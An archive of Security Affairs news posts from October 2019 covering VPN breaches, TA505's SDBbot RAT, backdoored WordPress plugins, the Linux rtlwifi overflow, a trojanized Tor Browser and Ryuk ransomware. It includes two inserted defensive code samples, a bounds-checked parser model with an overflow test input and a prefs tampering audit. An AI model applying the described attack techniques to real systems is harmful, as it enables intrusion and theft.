Category Archives: Security Affairs

NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches

The NordVPN and TorGuard VPN firms were hacked; threat actors leaked the private keys used to secure their web servers, together with VPN configuration files.

Hackers breached systems used by the NordVPN and TorGuard VPN companies and leaked the private keys used to secure their web servers, together with VPN configuration files.

The NordVPN information that was leaked online was stolen from one of the VPN provider's servers last year.

The attackers leaked at least three private keys that belong to the company, one from an older NordVPN site certificate and two OpenVPN keys.

The certificate expired in October 2018, which suggests that the hack happened last year, although it cannot be excluded that the server was simply still storing the key of an already outdated certificate.

After the keys were leaked online, experts pointed out that attackers could set up rogue VPN servers and use them to carry out MiTM attacks on users’ traffic.

Experts at Golem.de remarked that the expired certificate could be used only to carry out a MiTM attack, but it could not have been used to decrypt the traffic.

“You can not decrypt stored VPN traffic directly with the leaked keys. From the configuration files also shown, it shows that the OpenVPN configuration uses a key exchange with Diffie-Hellman, so that the connections have the so-called forward-secrecy property, which prevents subsequent decryption.” reads the post published by golem.de. “The keys could be used for a man-in-the-middle attack. In addition, it can be assumed that the attacker was able to access traffic during the hack.”


NordVPN confirmed the incident that took place in March 2018 when hackers accessed one of the datacenters in Finland operated by a third-party provider.

“A few months ago, we became aware that, on March 2018, one of the datacenters in Finland we had been renting our servers from was accessed with no authorization.” reads the statement published by the VPN provider. “The attacker gained access to the server by exploiting an insecure remote management system left by the datacenter provider. We were unaware that such a system existed. The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.”

The company highlighted that the expired TLS key was stored only in the breached datacenter in Finland, so it could not have been used to decrypt the VPN traffic of any other server. The only possible way to abuse website traffic would have been a personalized and sophisticated MiTM attack intercepting a single connection that tried to reach nordvpn.com.

After the incident, NordVPN immediately launched an investigation and terminated the contract with the server provider.

The incident also impacted other VPN providers using the same data center, such as VikingVPN and TorGuard.

TorGuard was the only one of the three VPN providers impacted by the incident to be implementing secure PKI management, which means that its main CA key was not stored on the affected VPN server.

“The single TorGuard server that was compromised was removed from our network in early 2018 and we have since terminated all business with the related hosting reseller because of repeated suspicious activity.” reads a statement published by TorGuard.

“TorGuard VPN or proxy traffic was not compromised during this isolated breach of a single VPN server and no sensitive information was compromised during this incident. Even though no security risk past or present was found, TorGuard has reissued all certs earlier this year per our security protocol.”

Pierluigi Paganini

(SecurityAffairs – VPN, hacking)

The post NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches appeared first on Security Affairs.

Czech Police and Intelligence agency dismantled Russian Spy ring on its soil

Czech police and intelligence services have identified a Russian espionage network whose nerve center was the Russian embassy in Prague.

Czech police and intelligence services have dismantled a Russian espionage network that was operating via Russia's embassy in Prague.

The officials were helped by peers at the National Organised Crime Centre (NCOZ).

According to officials, the cyberspies were setting up a structure to hit targets in the Czech Republic and abroad.

Michal Koudelka, head of the Czech Republic’s BIS intelligence service, confirmed that the authorities busted the cyber espionage ring that is allegedly part of a larger organization set up by Russia and operating in other European countries.

“The network was completely destroyed and decimated,” Michal Koudelka, said in parliament, quoted by the Czech CTK news agency.

“It was created by people with links to Russian intelligence services and financed from Russia and the Russian embassy,”

In August, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. Daily N, the Czech independent daily, has accused Russia multiple times of the attacks against the foreign ministry, which took place in June.

According to a report published in September by the NUKIB Czech Intelligence agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.


Avast internal network breached for the second time by sophisticated hackers

The popular security firm Avast disclosed today a security breach that impacted its internal network accessed via a compromised VPN profile.

The security firm Avast disclosed today a security breach that impacted its internal network. According to a statement published by the company, the intent of the hackers was to carry out a supply chain attack.

It seems that the attackers attempted to inject malicious code into CCleaner, an attack scenario similar to the one that hit the company in 2017.

The attack was spotted on September 23, when Avast experts noticed suspicious behavior on the internal network. The subsequent investigation involved the Czech intelligence agency, Security Information Service (BIS), the cybersecurity division of the local Czech police force, and an external forensics team.

The hackers compromised a VPN account to access the company's internal network. The account did not have domain admin privileges, but the hackers successfully escalated their privileges.

Avast pointed out that hackers used compromised credentials through a temporary VPN profile that did not require 2FA.

“The user, whose credentials were apparently compromised and associated with the IP, did not have domain admin privileges. However, through a successful privilege escalation, the actor managed to obtain domain admin privileges. The connection was made from a public IP hosted out of the UK and we determined the attacker also used other endpoints through the same VPN provider.” reads the statement published by Avast.

The analysis of the external IPs used by the attackers revealed that the threat actors had been attempting to gain access to the network through the VPN as early as May 14.

In an attempt to track the attackers, Avast did not close the temporary VPN profile and monitored every access to the internal network until October 15.

“Even though we believed that CCleaner was the likely target of a supply chain attack, as was the case in a 2017 CCleaner breach, we cast a wider net in our remediation actions.” continues the statement.

Avast adopted the following measures to mitigate the incident:

  • On September 25, Avast halted upcoming CCleaner releases and began checking prior CCleaner releases.
  • The company re-signed a clean update of the product and pushed it out to users via an automatic update on October 15.
  • The company revoked the previous certificate.

At the time of writing, it is not possible to determine if this attack was linked to the one that occurred in 2017.

“Having taken all these precautions, we are confident to say that our CCleaner users are protected and unaffected,” concludes the statement.

“From the insights we have gathered so far, it is clear that this was an extremely sophisticated attempt against us that had the intention to leave no traces of the intruder or their purpose, and that the actor was progressing with exceptional caution in order to not be detected. We do not know if this was the same actor as before and it is likely we will never know for sure, so we have named this attempt ‘Abiss’.”

The company, along with law enforcement, is still investigating the incident.


TA505 cybercrime group use SDBbot RAT in recent campaigns

The TA505 cybercrime group, which operated the Dridex Trojan and the Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, which is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. The group has been active since 2014, focusing on the retail and banking sectors.

SDBbot is a backdoor delivered via a new downloader, dubbed Get2, that is written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The new Get2 downloader was first observed in early September, when the group used it in targeted attacks against financial institutions in Greece, Singapore, the United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, using weaponized Microsoft Office documents that leverage the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.


SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence.

The attackers switched from attachments to shortened URLs pointing to a malicious Excel sheet; the attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to a hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components: an installer, a loader, and a backdoor component.

The installer stores the RAT in the registry and establishes persistence for the loader. If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method; if it is running as admin on Windows XP or 7, persistence is established using application shimming.

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.

The loader executes shellcode from the binary blob stored in the registry; that shellcode decompresses the RAT and loads and executes it as a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.


US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal

The news is quite curious: the US military will no longer use 8-inch floppy disks in the antiquated computer system (SACCS) that manages its nuclear weapons arsenal.

It’s official: US Strategic Command has announced that it has replaced the 8-inch floppy disks in an ancient computer used to receive nuclear launch orders from the President with a “highly-secure solid state digital storage solution.”

The use of the 8-inch floppy disks was revealed back in 2014 by the CBS “60 Minutes” TV show.

“At long last, that system, the Strategic Automated Command and Control System or SACCS, has dumped the floppy disk, moving to a “highly-secure solid state digital storage solution” this past June, said Lt. Col. Jason Rossi, commander of the Air Force’s 595th Strategic Communications Squadron.” reported c4isrnet.com.

The Strategic Automated Command and Control System (SACCS) is used by US nuclear forces to send orders from command centers to field forces in case of crisis. It is considered totally secure because it is completely isolated from the internet, even though researchers worldwide have demonstrated that there are many ways to breach an air-gapped network.

The Strategic Automated Command and Control System (SACCS) is a United States Strategic Command command and control system to coordinate the operational functions of United States nuclear forces (ICBMs, nuclear bombers, and SLBMs).

“You can’t hack something that doesn’t have an IP address. It’s a very unique system — it is old and it is very good,” Rossi added.

In June, the US Air Force replaced the floppy disks in the SACCS nuclear weapons management system with a “highly-secure solid state digital storage solution.”

The system has been operating since 1968, running on an IBM Series/1 mainframe and using 8-inch floppy disks for storage.

The use of 8-inch floppy disks was also confirmed by a report published by the US Government Accountability Office (GAO).

“Coordinates the operational functions of the United States’ nuclear forces, such as intercontinental ballistic missiles, nuclear bombers, and tanker support aircrafts. This system runs on an IBM Series/1 Computer—a 1970s computing system— and uses 8-inch floppy disks.” states the report.

“The agency plans to update its data storage solutions, port expansion processors, portable terminals, and desktop terminals by the end of fiscal year 2017.”

Robert Norman, a civilian Air Force employee working under Lt. Col. Rossi with more than four years of experience fixing the electronics on SACCS, explained that every issue on the ancient system requires dedicated maintenance, and the damaged components are often repaired by experts like him.

“Any electronic repair is going to take a lot of work. I shouldn’t say it’s difficult, [but] unfortunately a lot of the newer electronics are plug and play,” he said, explaining that when electronic components like motherboards or microchips break on newer systems, the common practice is to throw them out and replace them, Norman told c4isrnet.com. “On SACCS, all of those pieces are repaired — which for maintainers could mean spending hours under a microscope, slowly but deliberately replacing a copper wire laced throughout a circuit board, for example. The challenges get a little larger when we’re actually repairing them down to component level.”

Experts pointed out that even if the hardware used by SACCS is antiquated, its software is constantly refreshed by young Air Force programmers.

The security of critical defense systems has been examined by the US Government several times. According to a report published by the Government Accountability Office (GAO) in October 2018, almost all new weapon systems in the Pentagon's arsenal are vulnerable to hacking.

According to the 50-page report published by the GAO, several vulnerabilities in the weapon systems were never fixed.


Security Affairs 2019-10-19 23:46:08

Threat actors leverage malicious plugins that hide in plain sight to backdoor WordPress websites and to use them for brute-forcing other sites.

The use of fake WordPress plugins installed by hackers is nothing new; researchers at Sucuri recently observed multiple infections aimed at installing fake plugins with backdoor capabilities.

Attackers use automated tools to create malicious WordPress plugins and include malicious payloads, such as web shells, in their code.

The researchers spotted some fake plugins with backdoor functionality, two of them named initiatorseo or updrat123 were based on the structure of the popular backup/restore WordPress plugin UpdraftPlus.

The UpdraftPlus WordPress plugin has more than 2 million active installations and its contributors regularly update it.

“While their code differs in terms of variable names, the malicious plugins do share a few things in common: they possess a similar structure along with header comments from the popular backup/restore plugin UpdraftPlus.” reads the post published by Sucuri.

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” found researchers at web security and protection company Sucuri.

The malicious WordPress plugins hide from the WordPress dashboard and are visible only to visitors using browsers with specific User-Agent strings, which vary from plugin to plugin.

The attacker could verify the presence of the malicious plugin using a GET request with custom parameters such as initiationactivity or testingkey.

The fake WordPress plugins allow attackers to establish a backdoor on the compromised sites and to provide them with access to the servers even after the original infection vector was removed.

The backdoors are used to upload arbitrary files for malicious purposes to the compromised servers using POST requests.

“Malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.” continues the post.

“So far, the names of these POST parameters have been unique for each plugin that we’ve analyzed.”

The POST requests carry parameters such as the URL where the payloads to download are located, or the path where the files should be written on the compromised server.

Sucuri researchers also observed attackers using fake plugins to upload files with random names (i.e. 5d9196744f88d5d9196744f893.php) to site root directories. These files contain a script that threat actors use to carry out brute force attacks on other sites.

“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface.” concludes Sucuri.

“Additionally, compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.”


A critical Linux Wi-Fi bug could be exploited to fully compromise systems

A researcher discovered a critical Linux vulnerability, tracked as CVE-2019-17666, that could be exploited to fully compromise vulnerable machines.

Nico Waisman, principal security engineer at GitHub, discovered a critical Linux flaw, tracked as CVE-2019-17666, that could be exploited by attackers to fully compromise vulnerable machines.

The vulnerability affects Linux kernel versions through 5.3.6; according to the researcher, the issue has existed at least since 2015.

The vulnerability is a heap buffer overflow in the “rtlwifi” driver, which allows certain Realtek Wi-Fi modules to communicate with the Linux operating system.

“rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.” reads the description published by NVD.

The issue affects a feature called the Notice of Absence protocol implemented in the “rtlwifi” driver. The protocol is used by devices to autonomously power down their radio and save energy.

“The Notice of Absence (NoA) protocol allows a P2P GO to announce time intervals, referred to as absence periods, where P2P Clients are not allowed to access the channel, regardless of whether they are in power save or in active mode. In this way, a P2P GO can autonomously decide to power down its radio to save energy.” reads a paper on Device to device communications.

The expert noticed that the driver fails to correctly handle Notice of Absence packets.

“Nicolas Waisman noticed that even though noa_len is checked for a compatible length it’s still possible to overrun the buffers of p2pinfo since there’s no check on the upper bound of noa_num. Bound noa_num against P2P_MAX_NOA_NUM.” reads the security advisory.

An attacker could use malformed packets to trigger the flaw and crash the system.

An unauthenticated attacker could trigger the flaw only if he is within the radio range of the target device.

“The vulnerability triggers an overflow, which means it could make Linux crash or if a proper exploit is written (which is not trivial), an attacker could obtain remote code-execution,” Waisman explained to the Threatpost.

The Linux kernel team has already developed a fix that is currently under review; it has not yet been merged into the Linux kernel.
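As an added example, not the kernel's code: a simplified model of the Notice of Absence attribute parse that the advisory describes, carrying the upper bound on noa_num against P2P_MAX_NOA_NUM that the fix prescribes. The struct layout, the 13-byte descriptor format (count/type, duration, interval, start time) and the choice to reject rather than clamp an oversized noa_num are this example's assumptions.

```c
/* Simplified model of the rtlwifi NoA attribute parse (CVE-2019-17666).
 * Not the kernel's code: struct, layout and helper names are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define P2P_MAX_NOA_NUM 2   /* bound the advisory names for the per-NoA arrays */
#define NOA_DESC_LEN    13  /* assumed descriptor size: count/type(1) + duration(4)
                               + interval(4) + start time(4) */

/* Simplified stand-in for the driver's p2pinfo structure. */
struct p2p_ps_info {
    uint8_t  noa_index;
    uint8_t  ctwindow;
    uint8_t  opp_ps;
    uint8_t  noa_num;
    uint8_t  noa_count_type[P2P_MAX_NOA_NUM];
    uint32_t noa_duration[P2P_MAX_NOA_NUM];
    uint32_t noa_interval[P2P_MAX_NOA_NUM];
    uint32_t noa_start_time[P2P_MAX_NOA_NUM];
};

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Parse a NoA attribute body of noa_len bytes into *info.
 * Returns the number of descriptors stored, or -1 if the attribute is rejected.
 * The length check alone (what the driver already had) accepts any number of
 * descriptors; the upper-bound check on noa_num is what keeps the loop index
 * inside the fixed-size arrays above. */
int parse_noa_attr(struct p2p_ps_info *info, const uint8_t *noa, size_t noa_len)
{
    if (noa_len < 2 || (noa_len - 2) % NOA_DESC_LEN != 0)
        return -1;                                /* length/alignment check */
    size_t noa_num = (noa_len - 2) / NOA_DESC_LEN;
    if (noa_num > P2P_MAX_NOA_NUM)                /* the missing upper bound */
        return -1;

    memset(info, 0, sizeof(*info));
    info->noa_index = noa[0];
    info->ctwindow  = noa[1] & 0x7f;
    info->opp_ps    = (noa[1] >> 7) & 1;
    info->noa_num   = (uint8_t)noa_num;

    const uint8_t *d = noa + 2;
    for (size_t i = 0; i < noa_num; i++, d += NOA_DESC_LEN) {
        info->noa_count_type[i] = d[0];
        info->noa_duration[i]   = get_le32(d + 1);
        info->noa_interval[i]   = get_le32(d + 5);
        info->noa_start_time[i] = get_le32(d + 9);
    }
    return (int)noa_num;
}

/* Build a constructed NoA attribute with n identical descriptors (test input).
 * Returns the attribute length, or 0 if it does not fit in cap bytes. */
size_t build_noa_attr(uint8_t *out, size_t cap, size_t n)
{
    size_t len = 2 + n * NOA_DESC_LEN;
    if (len > cap)
        return 0;
    out[0] = 1;             /* noa_index */
    out[1] = 0x80 | 10;     /* OppPS set, CTWindow = 10 */
    for (size_t i = 0; i < n; i++) {
        uint8_t *d = out + 2 + i * NOA_DESC_LEN;
        d[0] = 255;                       /* count: continuous */
        put_le32(d + 1, 1000);            /* duration */
        put_le32(d + 5, 3000);            /* interval */
        put_le32(d + 9, 0x11223344u);     /* start time */
    }
    return len;
}

/* Convenience: build an attribute with n descriptors and parse it.
 * Returns the parser's result, or -2 if the attribute could not be built. */
int parse_constructed(size_t n, struct p2p_ps_info *info)
{
    uint8_t buf[2 + 8 * NOA_DESC_LEN];
    size_t len = build_noa_attr(buf, sizeof buf, n);
    if (len == 0)
        return -2;
    return parse_noa_attr(info, buf, len);
}

int main(void)
{
    struct p2p_ps_info info;
    for (size_t n = 0; n <= 3; n++)
        printf("%zu descriptor(s): result %d\n", n, parse_constructed(n, &info));
    return 0;
}
```

With the bound removed, the three-descriptor input passes the length check and the loop writes a third element into two-element arrays; with the bound present it is rejected before any write.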


Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Over 600 million UC Browser and UC Browser Mini Android users have been exposed to man-in-the-middle (MiTM) attacks.

More than 600 million users of the popular UC Browser and UC Browser Mini Android apps have been exposed to man-in-the-middle (MiTM) attacks by downloading an Android Package Kit (APK) from a third party server over unprotected channels.

The UC Browser is developed by UCWeb, a company owned by the Alibaba Group since 2014, and is the world’s fourth most popular mobile browser according to StatCounter.

Researchers at Zscaler were investigating unusual activity when they discovered questionable connections to a specific domain, 9appsdownloading[.]com. The requests were being made by the popular browser app.

Further investigation allowed the researchers to determine that the UC Browser app was attempting to download an additional Android Package Kit (APK) over an unsecured channel (HTTP instead of HTTPS). This practice violates Google Play policy, and the use of an unsecured channel exposes users to man-in-the-middle attacks, which could allow attackers to deliver and install an arbitrary payload on a target device to perform a broad range of malicious activities.

The analysis of the APK revealed that it was available on a third-party app store named 9Apps, with the com.mobile.indiapp package name.

Once installed on a device, the 9Apps app started scanning for installed applications and it allowed installing more apps from the third-party app store that were downloaded as APKs from the 9appsdownloading[.]com domain.


Researchers also pointed out that dropping an APK on external storage (/storage/emulated/0) could allow other apps, with appropriate permissions, to tamper with the APK.

Zscaler shared its findings with Google on August 13, and the discussion on the potential violation lasted until September 25.

On September 27, Google acknowledged the problems and reported them to UCWeb, asking the development team to “update the apps and remediate the policy violation.” UCWeb then addressed the issues in its apps.

“It is too early to determine exactly what the Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.” concludes the analysis published by Zscaler.

“Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications,”

In May, security researcher Arif Khan discovered a browser address bar spoofing flaw in the popular browser apps for Android.


Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft has released a new free decryption tool for the STOP (Djvu) ransomware; in recent months its research team has helped victims of many other threats.

The STOP (Djvu) ransomware has 160 variants that have infected hundreds of thousands of victims worldwide. Experts estimate a total of 460,000 victims, which makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Djvu ransomware encrypts victims’ files with Salsa20 and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decryption software is $980; victims can receive a 50% discount if they contact the crooks within the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks; experts pointed out that some versions of STOP also bundle additional malicious payloads, including password stealers.

The decryptor released by Emsisoft can recover, free of charge, files encrypted by 148 of the 160 variants, which means that approximately 70% of victims will be able to recover their data. Unfortunately, it is currently not possible to decrypt files encrypted by the remaining 12 variants.

Below are the key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here


Systems at Ingredients provider Ingredion infected with a Malware

The US ingredient provider Ingredion Incorporated announced that it has recently detected suspicious activity associated with a malware attack.

The US ingredient provider Ingredion Incorporated revealed that it detected an ongoing malware attack after its experts noticed suspicious activity this week. Ingredion has hired third-party experts to help its staff investigate the incident and restore the affected systems.

At the time of writing, the company had not provided details about the attack; Ingredion only said that there is no evidence that hackers accessed customer, supplier or employee data.

“The company warns that it has called in external experts to assist with restoring affected servers, and there may be some delays in transactions with customers and suppliers.” reported SecurityWeek.

“The ingredient solutions provider admitted that it “will take time” to restore some of the impacted systems.”


Experts believe that the company was infected with a piece of ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a security incident; today the company published an update on the attack and confirmed that the root cause of the disruption of its services was “the Ryuk virus malware attack.”


Trojanized Tor Browser targets shoppers of Darknet black marketplaces

A tainted version of the Tor Browser is targeting dark web market shoppers to steal their cryptocurrency and gather information on their browsing activity.

A Trojanized version of the Tor Browser is targeting shoppers of black marketplaces on the dark web; the threat actors aim to steal their cryptocurrency and gather information on their browsing activity.

At the time of writing, attackers have already stolen about $40,000 worth of Bitcoin through more than 860 transactions registered to three of the attackers’ wallets.

“Utilizing a trojanized version of an official Tor Browser package, the cybercriminals behind this campaign have been very successful – so far their pastebin.com accounts have had more than 500,000 views and they were able to steal US$40,000+ in bitcoins.” reads a post published by ESET.

The weaponized version of the Tor Browser is promoted on Pastebin as the Russian version of the popular software. The Pastebin posts advertise it as also including an anti-captcha feature that lets users speed up their browsing.

The trojanized Tor browser variant is hosted on the following two domains created in 2014 that are designed to appear as the official Russian version of the software:

  • tor-browser[.]org
  • torproect[.]org (the URL is missing “j”)

Threat actors also optimized the posts promoting the malicious software to appear as top results for queries for drugs, censorship bypass, and Russian politicians.

Between 2017 and early 2018, crooks promoted the webpages of the trojanized Tor Browser using spam messages on multiple Russian forums.

The home page of both sites displays a warning to the visitors informing them that they have an outdated Tor Browser, even if the visitors are using the most up-to-date Tor Browser version.

“Your anonymity is in danger! WARNING: Your Tor Browser is outdated. Click the button ‘Update’” reads the English translation.

When the users click on the “Update Tor Browser” button, they are redirected to a second website that delivers a Windows installer.

“This trojanized Tor Browser is a fully functional application. In fact, it is based on Tor Browser 7.5, which was released in January 2018. Thus, non-technically-savvy people probably won’t notice any difference between the original version and the trojanized one.” continues the analysis.

“No changes were made to source code of the Tor Browser; all Windows binaries are exactly the same as in the original version. However, these criminals changed the default browser settings and some of the extensions.”

The Trojanized Tor Browser has its update feature disabled to prevent victims from updating to a clean version; the attackers also changed the default User-Agent to a unique hardcoded value that they use as a fingerprint.

“The most important change is to the xpinstall.signatures.required settings, which disable a digital signature check for installed Tor Browser add-ons.” reads the post. “Therefore, the attackers can modify any add-on and it will be loaded by the browser without any complaint about it failing its digital signature check.”
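
One way a defender can check a profile for the settings changes described above, as an added example that is not part of the original article or of ESET's tooling: a small Python script that parses a Firefox-style prefs.js (Tor Browser uses the same user_pref() format) and flags the tampered knobs. The name xpinstall.signatures.required is the one ESET quotes; general.useragent.override and app.update.enabled are standard Firefox preference names and are assumed here to be the settings behind the User-Agent change and the disabled updater. The two sample prefs files are constructed.

```python
import re

# Added example, not code from the original article or from ESET. Parses a
# Firefox/Tor Browser prefs.js and flags the kinds of tampering the write-up
# describes. Pref names other than xpinstall.signatures.required are assumed
# (standard Firefox names); the sample files below are constructed.

PREF_LINE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')

# Constructed sample: the kind of profile a tampered bundle would ship.
TAMPERED_PREFS = """\
user_pref("app.update.enabled", false);
user_pref("xpinstall.signatures.required", false);
user_pref("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0");
user_pref("network.proxy.socks_port", 9150);
"""

# Constructed sample: values a genuine profile would carry.
CLEAN_PREFS = """\
user_pref("xpinstall.signatures.required", true);
user_pref("network.proxy.socks_port", 9150);
"""


def parse_prefs(text: str) -> dict:
    """Return {pref_name: value} with booleans, integers and strings converted."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if not m:
            continue
        name, raw = m.groups()
        if raw in ("true", "false"):
            prefs[name] = raw == "true"
        elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
            prefs[name] = raw[1:-1]
        else:
            try:
                prefs[name] = int(raw)
            except ValueError:
                prefs[name] = raw  # leave anything unusual untouched
    return prefs


def audit_prefs(prefs: dict) -> list:
    """List the tampering indicators present in a parsed prefs dict."""
    findings = []
    # With signature checks off, a modified add-on (e.g. HTTPS Everywhere) loads silently.
    if prefs.get("xpinstall.signatures.required") is False:
        findings.append("add-on signature verification disabled")
    # A disabled updater keeps the victim on the tampered build.
    if prefs.get("app.update.enabled") is False:
        findings.append("browser auto-update disabled")
    # A hard-coded UA override is both a fingerprint and a sign of a non-stock profile.
    if "general.useragent.override" in prefs:
        findings.append("User-Agent override present: %r" % prefs["general.useragent.override"])
    return findings


if __name__ == "__main__":
    for label, text in (("tampered", TAMPERED_PREFS), ("clean", CLEAN_PREFS)):
        print(label, audit_prefs(parse_prefs(text)) or ["no indicators"])
```

Point the script at the prefs.js (or user.js) inside the browser's profile directory; an unmodified bundle should produce no findings.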

Crooks also modified the HTTPS Everywhere add-on included with the browser to add a content script (script.js) that will be executed on load in the context of every webpage.

The JavaScript payload uses a standard webinject mechanism that allows stealing content in forms, hiding original content, showing fake messages, or adding its own content.

The only JavaScript payload observed by ESET was used to target visitors of three of the largest Russian-speaking darknet markets. This script attempts to alter QIWI (a popular Russian money transfer service) or bitcoin wallets located on pages of these markets.

Using this trick, the attackers hijack payments by replacing the wallet addresses shown to shoppers with ones belonging to the attackers.

“As of this writing, the total amount of received funds for all three wallets is 4.8 bitcoin, which corresponds to over US$40,000. It should be noted that the real amount of stolen money is higher because the trojanized Tor Browser also alters QIWI wallets.” concludes ESET that also shared IoCs. “This trojanized Tor Browser is a non-typical form of malware, designed to steal digital currency from visitors to darknet markets. Criminals didn’t modify binary components of the Tor Browser; instead, they introduced changes to settings and the HTTPS Everywhere extension. This has allowed them to steal digital money, unnoticed, for years.”

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company has now published an update on the attack, confirming that the root cause of the disruption of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The attack paralyzed the mailing system products; the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that it has now restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September the city of New Bedford was infected with Ryuk ransomware but did not pay the $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, and in early March Jackson County, Georgia, was hit by the same ransomware, which paralyzed government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw

A researcher has published proof-of-concept (PoC) exploit code for the CVE-2019-2215 zero-day flaw in Android recently addressed by Google.

In early October, Google Project Zero researcher Maddie Stone publicly disclosed a zero-day vulnerability in Android, tracked as CVE-2019-2215.

According to the expert, the bug was allegedly being used or sold by the controversial surveillance firm NSO Group.

